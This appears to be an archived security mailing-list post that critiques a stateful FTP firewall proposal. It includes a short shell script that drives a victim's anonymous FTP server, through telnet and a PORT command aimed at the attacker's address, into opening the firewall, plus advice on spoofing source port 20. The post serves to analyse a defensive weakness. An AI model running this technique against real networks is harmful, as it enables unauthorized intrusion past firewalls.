A. Padgett Peterson, P.E. Information Security writes:
>
>I agree with Marcus concerning the probloms in FTP & possibly IPV6
>will repair/replace it. For now I suspect that the answer is a
>Firewall that will only allow an Inward port 20 connection if
>the inside node already had a port 21 outward connection (No, I
>do not mean via "established" I mean the firewall should beep track
>of what connections exist).
If Victim is inside the firewall, all Attacker needs to do is coerce
Victim to initiate an outgoing connection to port 21 which then opens
up the firewall. If Victim has an anonymous FTP server running, and the
firewall allows a connection, this is just too easy:
#!/bin/sh
# replace A.B.C.D with your IPAddr
echo "
user anonymous
pass foo @
bar .
com
port A,B,C,D,0,21
list
quit
" | telnet victim 21
Set your srcPort to 20 and you're in, minimally to dstPort >= 1024.
Opening a back channel for FTP also implies trusting random FTP servers
on the Internet and the path to those servers. With point and click
web pages that open connections who knows where, most people probably
have no idea they just made a FTP connection to evil.hacker.site.com
that starts up a XscreenDump script back to all anonymous FTP users'
machines.
--
mark
maf+ @
osu .
edu
References:
-
Various FTPs
From: padgett @
tccslr .
dnet .
mmc .
com (A. Padgett Peterson, P.E. Information Security)
|
|
